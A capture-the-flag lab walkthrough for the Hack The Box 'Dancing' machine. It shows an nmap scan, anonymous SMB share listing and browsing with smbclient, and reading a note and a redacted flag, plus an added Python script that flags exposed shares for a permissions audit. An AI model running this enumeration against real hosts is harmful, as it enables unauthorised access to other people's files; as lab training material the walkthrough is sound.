HTB | Dancing - Starting Point

https://app.hackthebox.com/machines/Dancing/



Dancing | Walkthrough

Phase
Reconnaissance
Foothold

Reconnaissance

Using nmap to enumerate open ports on the target (with no -p option, nmap scans its default set of 1,000 common TCP ports):

nmap -sV 10.129.146.192
nmap
nopedawn@npdn ~/L/H/S/Dancing> nmap -sV 10.129.146.192
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-09 10:48 WIB
Nmap scan report for 10.129.146.192
Host is up (0.65s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.10 seconds

The target machine is a Windows host with SMB services exposed. Initial port scanning using nmap revealed ports 135, 139, and 445, indicating SMB was available.

smbclient -L //10.129.146.192

From the context of the machine, the service involved is Samba (SMB), so I’ll try to enumerate SMB on port 445.

smb enumerating
$ smbclient -L //10.129.146.192
Password for [WORKGROUP\nopedawn]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
SMB1 disabled -- no workgroup available

SMB enumeration was performed without credentials. The server allowed anonymous access and exposed several shares, including a custom share named WorkShares.
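
The same listing is what a defender sees when auditing their own hosts for shares that can be listed without credentials. The Python below is an added example, not part of the original walkthrough: it parses the smbclient -L output shown above and separates the Windows built-in shares from administrator-created disk shares such as WorkShares. The function names and the built-in share pattern are assumptions of this example.

```python
import re

# Listing copied from the smbclient -L output shown above (raw string: it contains a backslash).
SAMPLE = r"""Password for [WORKGROUP\nopedawn]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
SMB1 disabled -- no workgroup available
"""

# A share row is indented: name, then a type keyword, then an optional comment.
# The lazy name group allows share names that contain spaces.
ROW = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>Disk|IPC|Printer)(?:\s+(?P<comment>.*))?$")

# Shares Windows creates itself: ADMIN$, IPC$, print$ and drive roots such as C$.
BUILTIN = re.compile(r"^(ADMIN\$|IPC\$|PRINT\$|[A-Z]\$)$", re.IGNORECASE)


def parse_shares(listing):
    """Return (name, type, comment) for each share row; headers and status lines are skipped."""
    shares = []
    for line in listing.splitlines():
        m = ROW.match(line.rstrip())
        if m:
            shares.append((m["name"], m["type"], m["comment"] or ""))
    return shares


def custom_disk_shares(listing):
    """Names of administrator-created disk shares that the listing exposed."""
    return [name for name, kind, _ in parse_shares(listing)
            if kind == "Disk" and not BUILTIN.match(name)]


if __name__ == "__main__":
    for name in custom_disk_shares(SAMPLE):
        print(f"review share permissions and contents: {name}")
```

Any share this reports for a host that was queried without credentials is a candidate for tightening share and NTFS permissions or disabling guest access.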



Foothold

workshares
nopedawn@npdn ~/L/H/S/Dancing> smbclient //10.129.146.192/WorkShares
Password for [WORKGROUP\nopedawn]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 15:22:01 2021
  ..                                  D        0  Mon Mar 29 15:22:01 2021
  Amy.J                               D        0  Mon Mar 29 16:08:24 2021
  James.P                             D        0  Thu Jun  3 15:38:03 2021

                5114111 blocks of size 4096. 1752916 blocks available
smb: \>

There are 4 shares; the WorkShares share was accessible anonymously. Two user directories were discovered: Amy.J and James.P.

smb: \> cd Amy.J\
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 16:08:24 2021
  ..                                  D        0  Mon Mar 29 16:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 18:00:37 2021
                5114111 blocks of size 4096. 1753207 blocks available
smb: \Amy.J\> more  worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as /tmp/smbmore.kChz2v (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing
/tmp/smbmore.kChz2v (END)


smb: \Amy.J\> cd ..
smb: \> ls
  .                                   D        0  Mon Mar 29 15:22:01 2021
  ..                                  D        0  Mon Mar 29 15:22:01 2021
  Amy.J                               D        0  Mon Mar 29 16:08:24 2021
  James.P                             D        0  Thu Jun  3 15:38:03 2021

                5114111 blocks of size 4096. 1753191 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 15:38:03 2021
  ..                                  D        0  Thu Jun  3 15:38:03 2021
  flag.txt                            A       32  Mon Mar 29 16:26:57 2021
                5114111 blocks of size 4096. 1753191 blocks available
smb: \James.P\> more flag.txt
getting file \James.P\flag.txt of size 32 as /tmp/smbmore.Qbioc6 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
REDACTED
/tmp/smbmore.Qbioc6 (END)

Anonymous SMB Share with Sensitive Information Disclosure